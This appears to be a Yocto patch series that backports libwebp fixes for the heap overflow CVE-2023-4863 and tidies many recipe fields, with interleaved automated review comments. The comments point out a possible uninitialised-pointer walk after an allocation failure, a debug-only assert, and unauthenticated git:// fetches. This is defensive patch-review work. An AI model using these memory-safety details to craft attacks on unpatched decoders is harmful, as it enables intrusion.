233+ BuildHuffmanTable(NULL, root_bits, code_lengths, code_lengths_size, NULL);
234 assert(code_lengths_size <= MAX_CODE_LENGTHS_SIZE);
235- if (root_table == NULL) {
236- total_size = BuildHuffmanTable(NULL, root_bits,
237- code_lengths, code_lengths_size, NULL);
238- } else if (code_lengths_size <= SORTED_SIZE_CUTOFF) {
239+ if (total_size == 0 || root_table == NULL) return total_size;
240+
241+ if (root_table->curr_segment->curr_table + total_size >=
242+ root_table->curr_segment->start + root_table->curr_segment->size) {
243+ // If 'root_table' does not have enough memory, allocate a new segment.
244+ // The available part of root_table->curr_segment is left unused because we
245+ // need a contiguous buffer.
246+ const int segment_size = root_table->curr_segment->size;
247+ struct HuffmanTablesSegment* next =
248+ (HuffmanTablesSegment*)WebPSafeMalloc(1, sizeof(*next));
249+ if (next == NULL) return 0;
250+ // Fill the new segment.
251+ // We need at least 'total_size' but if that value is small, it is better to
252+ // allocate a big chunk to prevent more allocations later. 'segment_size' is
253+ // therefore chosen (any other arbitrary value could be chosen).
254+ next->size = total_size > segment_size ? total_size : segment_size;
255+ next->start =
256+ (HuffmanCode*)WebPSafeMalloc(next->size, sizeof(*next->start));
257+ if (next->start == NULL) {
258+ WebPSafeFree(next);
259+ return 0;
260+ }
261+ next->curr_table = next->start;
262+ next->next = NULL;
263+ // Point to the new segment.
264+ root_table->curr_segment->next = next;
265+ root_table->curr_segment = next;
266+ }
267+ if (code_lengths_size <= SORTED_SIZE_CUTOFF) {
268 // use local stack-allocated array.
269 uint16_t sorted[SORTED_SIZE_CUTOFF];
270- total_size = BuildHuffmanTable(root_table, root_bits,
271- code_lengths, code_lengths_size, sorted);
272- } else { // rare case. Use heap allocation.
273+ BuildHuffmanTable(root_table->curr_segment->curr_table, root_bits,
274+ code_lengths, code_lengths_size, sorted);
275+ } else { // rare case. Use heap allocation.
276 uint16_t* const sorted =
277 (uint16_t*)WebPSafeMalloc(code_lengths_size, sizeof(*sorted));
278 if (sorted == NULL) return 0;
279- total_size = BuildHuffmanTable(root_table, root_bits,
280- code_lengths, code_lengths_size, sorted);
281+ BuildHuffmanTable(root_table->curr_segment->curr_table, root_bits,
282+ code_lengths, code_lengths_size, sorted);
283 WebPSafeFree(sorted);
284 }
285 return total_size;
286 }
287+
288+int VP8LHuffmanTablesAllocate(int size, HuffmanTables* huffman_tables) {
289+ // Have 'segment' point to the first segment for now, 'root'.
290+ HuffmanTablesSegment* const root = &huffman_tables->root;
291+ huffman_tables->curr_segment = root;
292+ // Allocate root.
293+ root->start = (HuffmanCode*)WebPSafeMalloc(size, sizeof(*root->start));
294+ if (root->start == NULL) return 0;
295+ root->curr_table = root->start;
296+ root->next = NULL;
297+ root->size = size;
298+ return 1;
299+}
300+
301+void VP8LHuffmanTablesDeallocate(HuffmanTables* const huffman_tables) {
302+ HuffmanTablesSegment *current, *next;
303+ if (huffman_tables == NULL) return;
304+ // Free the root node.
305+ current = &huffman_tables->root;
306+ next = current->next;
307+ WebPSafeFree(current->start);
308+ current->start = NULL;
309+ current->next = NULL;
310+ current = next;
311+ // Free the following nodes.
312+ while (current != NULL) {
313+ next = current->next;
314+ WebPSafeFree(current->start);
315+ WebPSafeFree(current);
316+ current = next;
317+ }
318+}
319diff --git a/src/utils/huffman_utils.h b/src/utils/huffman_utils.h
320index 13b7ad1..98415c5 100644
321--- a/src/utils/huffman_utils.h
322+++ b/src/utils/huffman_utils.h
323@@ -43,6 +43,29 @@ typedef struct {
324 // or non-literal symbol otherwise
325 } HuffmanCode32;
326
327+// Contiguous memory segment of HuffmanCodes.
328+typedef struct HuffmanTablesSegment {
329+ HuffmanCode* start;
330+ // Pointer to where we are writing into the segment. Starts at 'start' and
331+ // cannot go beyond 'start' + 'size'.
332+ HuffmanCode* curr_table;
333+ // Pointer to the next segment in the chain.
334+ struct HuffmanTablesSegment* next;
335+ int size;
336+} HuffmanTablesSegment;
337+
338+// Chained memory segments of HuffmanCodes.
339+typedef struct HuffmanTables {
340+ HuffmanTablesSegment root;
341+ // Currently processed segment. At first, this is 'root'.
342+ HuffmanTablesSegment* curr_segment;
343+} HuffmanTables;
344+
345+// Allocates a HuffmanTables with 'size' contiguous HuffmanCodes. Returns 0 on
346+// memory allocation error, 1 otherwise.
347+int VP8LHuffmanTablesAllocate(int size, HuffmanTables* huffman_tables);
348+void VP8LHuffmanTablesDeallocate(HuffmanTables* const huffman_tables);
349+
350 #define HUFFMAN_PACKED_BITS 6
351 #define HUFFMAN_PACKED_TABLE_SIZE (1u << HUFFMAN_PACKED_BITS)
352
353@@ -78,9 +101,7 @@ void VP8LHtreeGroupsFree(HTreeGroup* const htree_groups);
354 // the huffman table.
355 // Returns built table size or 0 in case of error (invalid tree or
356 // memory error).
357-// If root_table is NULL, it returns 0 if a lookup cannot be built, something
358-// > 0 otherwise (but not the table size).
359-int VP8LBuildHuffmanTable(HuffmanCode* const root_table, int root_bits,
360+int VP8LBuildHuffmanTable(HuffmanTables* const root_table, int root_bits,
361 const int code_lengths[], int code_lengths_size);
362
363 #ifdef __cplusplus
364--
3652.40.0
366
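Review bot: `VP8LHuffmanTablesAllocate()` returns 0 on allocation failure before it reaches `root->next = NULL;`, and `ReadHuffmanCodeLengths()` then jumps to `End:`, where `VP8LHuffmanTablesDeallocate(&tables)` reads `current->next` from the stack-allocated, uninitialised `tables` and walks it as a segment list. The instance in `hdr->huffman_tables_` is zeroed beforehand (the added asserts say so), so only the local one is exposed. Moving the assignment ahead of the allocation closes the gap: `root->next = NULL;` placed directly after `huffman_tables->curr_segment = root;`. Separately, in `VP8LBuildHuffmanTable()` the `assert(code_lengths_size <= MAX_CODE_LENGTHS_SIZE)` now runs after the first `BuildHuffmanTable(NULL, ...)` call has already used `code_lengths_size`.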
diff --git a/meta/recipes-multimedia/webp/files/CVE-2023-4863-0002.patch b/meta/recipes-multimedia/webp/files/CVE-2023-4863-0002.patch
new file mode 100644
index 0000000000..c1eedb6100
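--- /dev/null
+++ b/meta/recipes-multimedia/webp/files/CVE-2023-4863-0002.patch
@@ -0,0 +1,53 @@
+From 95ea5226c870449522240ccff26f0b006037c520 Mon Sep 17 00:00:00 2001
+From: Vincent Rabaud <vrabaud@google.com>
+Date: Mon, 11 Sep 2023 16:06:08 +0200
+Subject: [PATCH 2/2] Fix invalid incremental decoding check.
+
+The first condition is only necessary if we have not read enough
+(enough being defined by src_last, not src_end which is the end
+of the image).
+The second condition now fits the comment below: "if not
+incremental, and we are past the end of buffer".
+
+BUG=oss-fuzz:62136
+
+Change-Id: I0700f67c62db8e1c02c2e429a069a71e606a5e4f
+
+CVE: CVE-2023-4863
+
+Upstream-Status: Backport [https://github.com/webmproject/libwebp/commit/95ea5226c870449522240ccff26f0b006037c520]
+
+Signed-off-by: Soumya Sambu <soumya.sambu@windriver.com>
+---
+ src/dec/vp8l_dec.c | 15 +++++++++++++--
+ 1 file changed, 13 insertions(+), 2 deletions(-)
+
+diff --git a/src/dec/vp8l_dec.c b/src/dec/vp8l_dec.c
+index 0d38314..684a5b6 100644
+--- a/src/dec/vp8l_dec.c
++++ b/src/dec/vp8l_dec.c
+@@ -1237,9 +1237,20 @@ static int DecodeImageData(VP8LDecoder* const dec, uint32_t* const data,
+ }
+
+ br->eos_ = VP8LIsEndOfStream(br);
+- if (dec->incremental_ && br->eos_ && src < src_end) {
++ // In incremental decoding:
++ // br->eos_ && src < src_last: if 'br' reached the end of the buffer and
++ // 'src_last' has not been reached yet, there is not enough data. 'dec' has to
++ // be reset until there is more data.
++ // !br->eos_ && src < src_last: this cannot happen as either the buffer is
++ // fully read, either enough has been read to reach 'src_last'.
++ // src >= src_last: 'src_last' is reached, all is fine. 'src' can actually go
++ // beyond 'src_last' in case the image is cropped and an LZ77 goes further.
++ // The buffer might have been enough or there is some left. 'br->eos_' does
++ // not matter.
++ assert(!dec->incremental_ || (br->eos_ && src < src_last) || src >= src_last);
++ if (dec->incremental_ && br->eos_ && src < src_last) {
+ RestoreState(dec);
+- } else if (!br->eos_) {
++ } else if ((dec->incremental_ && src >= src_last) || !br->eos_) {
+ // Process the remaining rows corresponding to last row-block.
+ if (process_func != NULL) {
+ process_func(dec, row > last_row ? last_row : row);
+--
+2.40.0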
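Review bot: The invariant this hunk documents for incremental decoding is enforced only by the added `assert(...)`, which is compiled out when the library is built with NDEBUG, so it should not be read as a runtime guard. In such a build the case the comment calls impossible (`!br->eos_ && src < src_last`) is taken by the `else if` branch through `|| !br->eos_` and rows are processed as usual; whether that is harmless depends on code outside this hunk, since DecodeImageData starts and ends beyond it. I would say so next to the assert, e.g. `// Debug-only check: with NDEBUG the branches below are the only enforcement.` The wording "either the buffer is fully read, either enough has been read" in the same comment should read "either ... or ...".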
diff --git a/meta/recipes-multimedia/webp/libwebp_1.1.0.bb b/meta/recipes-multimedia/webp/libwebp_1.1.0.bb
index 68e5ae2b3c..88c36cb76c 100644
--- a/meta/recipes-multimedia/webp/libwebp_1.1.0.bb
+++ b/meta/recipes-multimedia/webp/libwebp_1.1.0.bb
@@ -19,6 +19,12 @@ SRC_URI[sha256sum] = "98a052268cc4d5ece27f76572a7f50293f439c17a98e67c4ea0c7ed6f5
19 19
20UPSTREAM_CHECK_URI = "http://downloads.webmproject.org/releases/webp/index.html" 20UPSTREAM_CHECK_URI = "http://downloads.webmproject.org/releases/webp/index.html"
21 21
22SRC_URI += " \
23 file://CVE-2023-1999.patch \
24 file://CVE-2023-4863-0001.patch \
25 file://CVE-2023-4863-0002.patch \
26"
27
22EXTRA_OECONF = " \ 28EXTRA_OECONF = " \
23 --disable-wic \ 29 --disable-wic \
24 --enable-libwebpmux \ 30 --enable-libwebpmux \
diff --git a/meta/recipes-multimedia/x264/x264_git.bb b/meta/recipes-multimedia/x264/x264_git.bb
index 39429a8809..6789646833 100644
--- a/meta/recipes-multimedia/x264/x264_git.bb
+++ b/meta/recipes-multimedia/x264/x264_git.bb
@@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f"
8 8
9DEPENDS = "nasm-native" 9DEPENDS = "nasm-native"
10 10
11SRC_URI = "git://github.com/mirror/x264;branch=stable \ 11SRC_URI = "git://github.com/mirror/x264;branch=stable;protocol=https \
12 file://don-t-default-to-cortex-a9-with-neon.patch \ 12 file://don-t-default-to-cortex-a9-with-neon.patch \
13 file://Fix-X32-build-by-disabling-asm.patch \ 13 file://Fix-X32-build-by-disabling-asm.patch \
14 " 14 "
diff --git a/meta/recipes-rt/rt-tests/rt-tests.inc b/meta/recipes-rt/rt-tests/rt-tests.inc
index 3ac39d90c3..29ebe2d361 100644
--- a/meta/recipes-rt/rt-tests/rt-tests.inc
+++ b/meta/recipes-rt/rt-tests/rt-tests.inc
@@ -2,7 +2,7 @@
2SRCREV = "dff174f994f547a5785d32454865f140daacb0f5" 2SRCREV = "dff174f994f547a5785d32454865f140daacb0f5"
3PE = "1" 3PE = "1"
4 4
5SRC_URI = "git://git.kernel.org/pub/scm/utils/rt-tests/rt-tests.git" 5SRC_URI = "git://git.kernel.org/pub/scm/utils/rt-tests/rt-tests.git;branch=main"
6# 1.2 to 1.5 seem to be development versions 6# 1.2 to 1.5 seem to be development versions
7UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>(?!1\.[2-6])(\d+(\.\d+)+))" 7UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>(?!1\.[2-6])(\d+(\.\d+)+))"
8 8
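Review bot: The rewritten SRC_URI pins `branch=main` but still fetches over the plain `git://` protocol, which gives no transport encryption or server authentication, while the x264 and l3afpad changes elsewhere in this diff add `protocol=https`. SRCREV pins the commit id, so the checked-out revision is still tied to that hash, but an authenticated transport is the safer default wherever the host offers one: `SRC_URI = "git://git.kernel.org/pub/scm/utils/rt-tests/rt-tests.git;branch=main;protocol=https"`. The same applies to the `git://git.yoctoproject.org/...;branch=master` URIs in matchbox-config-gtk, matchbox-desktop, matchbox-panel-2, matchbox-terminal, matchbox-theme-sato, sato-screenshot and settings-daemon, and to `git://git.tartarus.org/simon/puzzles.git;branch=main`, assuming those hosts serve the repositories over HTTPS.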
diff --git a/meta/recipes-rt/rt-tests/rt-tests_1.1.bb b/meta/recipes-rt/rt-tests/rt-tests_1.1.bb
index dad252b4ed..1db86b5067 100644
--- a/meta/recipes-rt/rt-tests/rt-tests_1.1.bb
+++ b/meta/recipes-rt/rt-tests/rt-tests_1.1.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Real-Time preemption testcases" 1SUMMARY = "Real-Time preemption testcases"
2HOMEPAGE = "https://rt.wiki.kernel.org/index.php/Cyclictest" 2HOMEPAGE = "https://wiki.linuxfoundation.org/realtime/documentation/start"
3DESCRIPTION = "The main aim of the PREEMPT_RT patch is to minimize the amount of kernel code that is non-preemptible Therefore several substitution mechanisms and new mechanisms are implemented."
3SECTION = "tests" 4SECTION = "tests"
4DEPENDS = "linux-libc-headers virtual/libc" 5DEPENDS = "linux-libc-headers virtual/libc"
5LICENSE = "GPLv2 & GPLv2+" 6LICENSE = "GPLv2 & GPLv2+"
diff --git a/meta/recipes-sato/images/core-image-sato-dev.bb b/meta/recipes-sato/images/core-image-sato-dev.bb
index 7fa69d0997..f45a83273c 100644
--- a/meta/recipes-sato/images/core-image-sato-dev.bb
+++ b/meta/recipes-sato/images/core-image-sato-dev.bb
@@ -3,5 +3,6 @@ require core-image-sato.bb
3DESCRIPTION = "Image with Sato for development work. It includes everything \ 3DESCRIPTION = "Image with Sato for development work. It includes everything \
4within core-image-sato plus a native toolchain, application development and \ 4within core-image-sato plus a native toolchain, application development and \
5testing libraries, profiling and debug symbols." 5testing libraries, profiling and debug symbols."
6HOMEPAGE = "https://www.yoctoproject.org/"
6 7
7IMAGE_FEATURES += "dev-pkgs" 8IMAGE_FEATURES += "dev-pkgs"
diff --git a/meta/recipes-sato/images/core-image-sato-ptest-fast.bb b/meta/recipes-sato/images/core-image-sato-ptest-fast.bb
index 4f08d6eb64..d37ad00cf8 100644
--- a/meta/recipes-sato/images/core-image-sato-ptest-fast.bb
+++ b/meta/recipes-sato/images/core-image-sato-ptest-fast.bb
@@ -7,6 +7,7 @@ require conf/distro/include/ptest-packagelists.inc
7IMAGE_INSTALL += "${PTESTS_FAST}" 7IMAGE_INSTALL += "${PTESTS_FAST}"
8 8
9DESCRIPTION += "Also includes ptest packages with fast execution times to allow for more automated QA." 9DESCRIPTION += "Also includes ptest packages with fast execution times to allow for more automated QA."
10HOMEPAGE = "https://www.yoctoproject.org/"
10 11
11# This image is sufficiently large (~1.8GB) that it can't actually fit in a live 12# This image is sufficiently large (~1.8GB) that it can't actually fit in a live
12# image (which has a 4GB limit), so nullify the overhead factor (1.3x out of the 13# image (which has a 4GB limit), so nullify the overhead factor (1.3x out of the
diff --git a/meta/recipes-sato/images/core-image-sato-sdk-ptest.bb b/meta/recipes-sato/images/core-image-sato-sdk-ptest.bb
index 4d59c9536b..eea89a5d6c 100644
--- a/meta/recipes-sato/images/core-image-sato-sdk-ptest.bb
+++ b/meta/recipes-sato/images/core-image-sato-sdk-ptest.bb
@@ -5,6 +5,7 @@ require core-image-sato-sdk.bb
5require conf/distro/include/ptest-packagelists.inc 5require conf/distro/include/ptest-packagelists.inc
6 6
7DESCRIPTION += "Also includes ptest packages." 7DESCRIPTION += "Also includes ptest packages."
8HOMEPAGE = "https://www.yoctoproject.org/"
8 9
9PROVIDES += "core-image-sato-ptest" 10PROVIDES += "core-image-sato-ptest"
10 11
diff --git a/meta/recipes-sato/images/core-image-sato-sdk.bb b/meta/recipes-sato/images/core-image-sato-sdk.bb
index d7cc52b52b..b52de0def0 100644
--- a/meta/recipes-sato/images/core-image-sato-sdk.bb
+++ b/meta/recipes-sato/images/core-image-sato-sdk.bb
@@ -3,6 +3,7 @@ require core-image-sato.bb
3DESCRIPTION = "Image with Sato support that includes everything within \ 3DESCRIPTION = "Image with Sato support that includes everything within \
4core-image-sato plus meta-toolchain, development headers and libraries to \ 4core-image-sato plus meta-toolchain, development headers and libraries to \
5form a standalone SDK." 5form a standalone SDK."
6HOMEPAGE = "https://www.yoctoproject.org/"
6 7
7IMAGE_FEATURES += "dev-pkgs tools-sdk \ 8IMAGE_FEATURES += "dev-pkgs tools-sdk \
8 tools-debug eclipse-debug tools-profile tools-testapps debug-tweaks ssh-server-openssh" 9 tools-debug eclipse-debug tools-profile tools-testapps debug-tweaks ssh-server-openssh"
diff --git a/meta/recipes-sato/images/core-image-sato.bb b/meta/recipes-sato/images/core-image-sato.bb
index 673106eb6d..300d8e0d43 100644
--- a/meta/recipes-sato/images/core-image-sato.bb
+++ b/meta/recipes-sato/images/core-image-sato.bb
@@ -1,6 +1,7 @@
1DESCRIPTION = "Image with Sato, a mobile environment and visual style for \ 1DESCRIPTION = "Image with Sato, a mobile environment and visual style for \
2mobile devices. The image supports X11 with a Sato theme, Pimlico \ 2mobile devices. The image supports X11 with a Sato theme, Pimlico \
3applications, and contains terminal, editor, and file manager." 3applications, and contains terminal, editor, and file manager."
4HOMEPAGE = "https://www.yoctoproject.org/"
4 5
5IMAGE_FEATURES += "splash package-management x11-base x11-sato ssh-server-dropbear hwcodecs" 6IMAGE_FEATURES += "splash package-management x11-base x11-sato ssh-server-dropbear hwcodecs"
6 7
@@ -12,4 +13,5 @@ TOOLCHAIN_HOST_TASK_append = " nativesdk-intltool nativesdk-glib-2.0"
12TOOLCHAIN_HOST_TASK_remove_task-populate-sdk-ext = " nativesdk-intltool nativesdk-glib-2.0" 13TOOLCHAIN_HOST_TASK_remove_task-populate-sdk-ext = " nativesdk-intltool nativesdk-glib-2.0"
13 14
14QB_MEM = '${@bb.utils.contains("DISTRO_FEATURES", "opengl", "-m 512", "-m 256", d)}' 15QB_MEM = '${@bb.utils.contains("DISTRO_FEATURES", "opengl", "-m 512", "-m 256", d)}'
16QB_MEM_qemuarmv5 = "-m 256"
15QB_MEM_qemumips = "-m 256" 17QB_MEM_qemumips = "-m 256"
diff --git a/meta/recipes-sato/l3afpad/l3afpad_git.bb b/meta/recipes-sato/l3afpad/l3afpad_git.bb
index 6fdcc3e392..4d5d299d47 100644
--- a/meta/recipes-sato/l3afpad/l3afpad_git.bb
+++ b/meta/recipes-sato/l3afpad/l3afpad_git.bb
@@ -1,4 +1,8 @@
1SUMMARY = "Simple GTK+ Text Editor" 1SUMMARY = "Simple GTK+ Text Editor"
2DESCRIPTION = "L3afpad is a simple GTK+ text editor that emphasizes simplicity. As development \
3focuses on keeping weight down to a minimum, only the most essential features \
4are implemented in the editor. L3afpad is simple to use, is easily compiled, \
5requires few libraries, and starts up quickly."
2HOMEPAGE = "https://github.com/stevenhoneyman/l3afpad" 6HOMEPAGE = "https://github.com/stevenhoneyman/l3afpad"
3 7
4# Note that COPYING seems to mistakenly contain LGPLv2.1. 8# Note that COPYING seems to mistakenly contain LGPLv2.1.
@@ -12,7 +16,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c \
12DEPENDS = "gtk+3 intltool-native gettext-native" 16DEPENDS = "gtk+3 intltool-native gettext-native"
13 17
14PV = "0.8.18.1.11+git${SRCPV}" 18PV = "0.8.18.1.11+git${SRCPV}"
15SRC_URI = "git://github.com/stevenhoneyman/l3afpad.git" 19SRC_URI = "git://github.com/stevenhoneyman/l3afpad.git;branch=master;protocol=https"
16SRCREV ="3cdccdc9505643e50f8208171d9eee5de11a42ff" 20SRCREV ="3cdccdc9505643e50f8208171d9eee5de11a42ff"
17 21
18S = "${WORKDIR}/git" 22S = "${WORKDIR}/git"
diff --git a/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb b/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb
index 547e851c15..5733a36b12 100644
--- a/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb
+++ b/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb
@@ -11,7 +11,7 @@ RDEPENDS_${PN} = "settings-daemon"
11 11
12# SRCREV tagged 0.2 12# SRCREV tagged 0.2
13SRCREV = "ef2192ce98d9374ffdad5f78544c3f8f353c16aa" 13SRCREV = "ef2192ce98d9374ffdad5f78544c3f8f353c16aa"
14SRC_URI = "git://git.yoctoproject.org/${BPN} \ 14SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master \
15 file://no-handed.patch" 15 file://no-handed.patch"
16UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))" 16UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))"
17 17
diff --git a/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb b/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb
index 5c23e85202..2a2eb24f57 100644
--- a/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb
+++ b/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb
@@ -1,4 +1,5 @@
1SUMMARY = "Matchbox Window Manager Desktop" 1SUMMARY = "Matchbox Window Manager Desktop"
2DESCRIPTION = "A lightweight windows manager for embedded systems. It uses the desktop background to provide an application launcher and allows modules to be loaded for additional functionality."
2HOMEPAGE = "http://matchbox-project.org/" 3HOMEPAGE = "http://matchbox-project.org/"
3BUGTRACKER = "http://bugzilla.yoctoproject.org/" 4BUGTRACKER = "http://bugzilla.yoctoproject.org/"
4 5
@@ -12,7 +13,7 @@ SECTION = "x11/wm"
12 13
13# SRCREV tagged 2.2 14# SRCREV tagged 2.2
14SRCREV = "6bc67d09da4147e5552fe30011a05a2c59d2f777" 15SRCREV = "6bc67d09da4147e5552fe30011a05a2c59d2f777"
15SRC_URI = "git://git.yoctoproject.org/${BPN}-2 \ 16SRC_URI = "git://git.yoctoproject.org/${BPN}-2;branch=master \
16 file://vfolders/* \ 17 file://vfolders/* \
17 " 18 "
18 19
diff --git a/meta/recipes-sato/matchbox-keyboard/matchbox-keyboard_0.1.1.bb b/meta/recipes-sato/matchbox-keyboard/matchbox-keyboard_0.1.1.bb
index dfc7fbad57..49e37bd77c 100644
--- a/meta/recipes-sato/matchbox-keyboard/matchbox-keyboard_0.1.1.bb
+++ b/meta/recipes-sato/matchbox-keyboard/matchbox-keyboard_0.1.1.bb
@@ -1,4 +1,5 @@
1SUMMARY = "Matchbox virtual keyboard for X11" 1SUMMARY = "Matchbox virtual keyboard for X11"
2DESCRIPTION = "An on screen 'virtual' or 'software' keyboard."
2HOMEPAGE = "http://matchbox-project.org" 3HOMEPAGE = "http://matchbox-project.org"
3BUGTRACKER = "http://bugzilla.yoctoproject.org/" 4BUGTRACKER = "http://bugzilla.yoctoproject.org/"
4SECTION = "x11" 5SECTION = "x11"
diff --git a/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb b/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb
index 2e6f5b7085..54fe578cd3 100644
--- a/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb
+++ b/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb
@@ -1,4 +1,6 @@
1SUMMARY = "Simple GTK+ based panel for handheld devices" 1SUMMARY = "Simple GTK+ based panel for handheld devices"
2DESCRIPTION = "A flexible always present 'window bar' for holding application \
3launchers and small 'applet' style applications"
2HOMEPAGE = "http://matchbox-project.org" 4HOMEPAGE = "http://matchbox-project.org"
3BUGTRACKER = "http://bugzilla.yoctoproject.org/" 5BUGTRACKER = "http://bugzilla.yoctoproject.org/"
4 6
@@ -21,7 +23,7 @@ RPROVIDES_${PN} = "matchbox-panel"
21RREPLACES_${PN} = "matchbox-panel" 23RREPLACES_${PN} = "matchbox-panel"
22RCONFLICTS_${PN} = "matchbox-panel" 24RCONFLICTS_${PN} = "matchbox-panel"
23 25
24SRC_URI = "git://git.yoctoproject.org/${BPN} \ 26SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master \
25 file://0001-applets-systray-Allow-icons-to-be-smaller.patch \ 27 file://0001-applets-systray-Allow-icons-to-be-smaller.patch \
26 " 28 "
27 29
diff --git a/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb b/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb
index 9f00281dde..e2e81c2905 100644
--- a/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb
+++ b/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb
@@ -11,7 +11,7 @@ SECTION = "x11/utils"
11 11
12#SRCREV tagged 0.2 12#SRCREV tagged 0.2
13SRCREV = "161276d0f5d1be8187010fd0d9581a6feca70ea5" 13SRCREV = "161276d0f5d1be8187010fd0d9581a6feca70ea5"
14SRC_URI = "git://git.yoctoproject.org/${BPN}" 14SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master"
15UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))" 15UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))"
16 16
17S = "${WORKDIR}/git" 17S = "${WORKDIR}/git"
diff --git a/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb b/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb
index 7a043d3447..bc4024736f 100644
--- a/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb
+++ b/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb
@@ -2,7 +2,7 @@ require matchbox-theme-sato.inc
2 2
3# SRCREV tagged 0.2 3# SRCREV tagged 0.2
4SRCREV = "df085ba9cdaeaf2956890b0e29d7ea1779bf6c78" 4SRCREV = "df085ba9cdaeaf2956890b0e29d7ea1779bf6c78"
5SRC_URI = "git://git.yoctoproject.org/matchbox-sato" 5SRC_URI = "git://git.yoctoproject.org/matchbox-sato;branch=master"
6UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))" 6UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))"
7 7
8S = "${WORKDIR}/git" 8S = "${WORKDIR}/git"
diff --git a/meta/recipes-sato/packagegroups/packagegroup-core-x11-sato.bb b/meta/recipes-sato/packagegroups/packagegroup-core-x11-sato.bb
index ed3f1a69a1..25725e078d 100644
--- a/meta/recipes-sato/packagegroups/packagegroup-core-x11-sato.bb
+++ b/meta/recipes-sato/packagegroups/packagegroup-core-x11-sato.bb
@@ -3,6 +3,8 @@
3# 3#
4 4
5SUMMARY = "Sato desktop" 5SUMMARY = "Sato desktop"
6DESCRIPTION = "Packagegroups provide a convenient mechanism of bundling a collection of packages."
7HOMEPAGE = "https://www.yoctoproject.org/"
6PR = "r33" 8PR = "r33"
7 9
8PACKAGE_ARCH = "${MACHINE_ARCH}" 10PACKAGE_ARCH = "${MACHINE_ARCH}"
diff --git a/meta/recipes-sato/pcmanfm/pcmanfm_1.3.1.bb b/meta/recipes-sato/pcmanfm/pcmanfm_1.3.1.bb
index 7885e0abae..153fbeb0b7 100644
--- a/meta/recipes-sato/pcmanfm/pcmanfm_1.3.1.bb
+++ b/meta/recipes-sato/pcmanfm/pcmanfm_1.3.1.bb
@@ -1,4 +1,5 @@
1SUMMARY = "Fast lightweight tabbed filemanager" 1SUMMARY = "Fast lightweight tabbed filemanager"
2DESCRIPTION = "A free file manager application and the standard file manager of LXDE."
2HOMEPAGE = "http://pcmanfm.sourceforge.net/" 3HOMEPAGE = "http://pcmanfm.sourceforge.net/"
3 4
4LICENSE = "GPLv2 & GPLv2+ & LGPLv2.1+" 5LICENSE = "GPLv2 & GPLv2+ & LGPLv2.1+"
diff --git a/meta/recipes-sato/puzzles/puzzles_git.bb b/meta/recipes-sato/puzzles/puzzles_git.bb
index 41b78d6fe1..3ee441998d 100644
--- a/meta/recipes-sato/puzzles/puzzles_git.bb
+++ b/meta/recipes-sato/puzzles/puzzles_git.bb
@@ -1,4 +1,5 @@
1SUMMARY = "Simon Tatham's Portable Puzzle Collection" 1SUMMARY = "Simon Tatham's Portable Puzzle Collection"
2DESCRIPTION = "Collection of small computer programs which implement one-player puzzle games."
2HOMEPAGE = "http://www.chiark.greenend.org.uk/~sgtatham/puzzles/" 3HOMEPAGE = "http://www.chiark.greenend.org.uk/~sgtatham/puzzles/"
3LICENSE = "MIT" 4LICENSE = "MIT"
4LIC_FILES_CHKSUM = "file://LICENCE;md5=6099f4981f9461d7f411091e69a7f07a" 5LIC_FILES_CHKSUM = "file://LICENCE;md5=6099f4981f9461d7f411091e69a7f07a"
@@ -8,7 +9,7 @@ DEPENDS = "libxt"
8# The libxt requires x11 in DISTRO_FEATURES 9# The libxt requires x11 in DISTRO_FEATURES
9REQUIRED_DISTRO_FEATURES = "x11" 10REQUIRED_DISTRO_FEATURES = "x11"
10 11
11SRC_URI = "git://git.tartarus.org/simon/puzzles.git \ 12SRC_URI = "git://git.tartarus.org/simon/puzzles.git;branch=main \
12 file://fix-compiling-failure-with-option-g-O.patch \ 13 file://fix-compiling-failure-with-option-g-O.patch \
13 file://0001-palisade-Fix-warnings-with-clang-on-arm.patch \ 14 file://0001-palisade-Fix-warnings-with-clang-on-arm.patch \
14 file://0001-Use-Wno-error-format-overflow-if-the-compiler-suppor.patch \ 15 file://0001-Use-Wno-error-format-overflow-if-the-compiler-suppor.patch \
diff --git a/meta/recipes-sato/rxvt-unicode/rxvt-unicode.inc b/meta/recipes-sato/rxvt-unicode/rxvt-unicode.inc
index b568f04580..0e5bcbe480 100644
--- a/meta/recipes-sato/rxvt-unicode/rxvt-unicode.inc
+++ b/meta/recipes-sato/rxvt-unicode/rxvt-unicode.inc
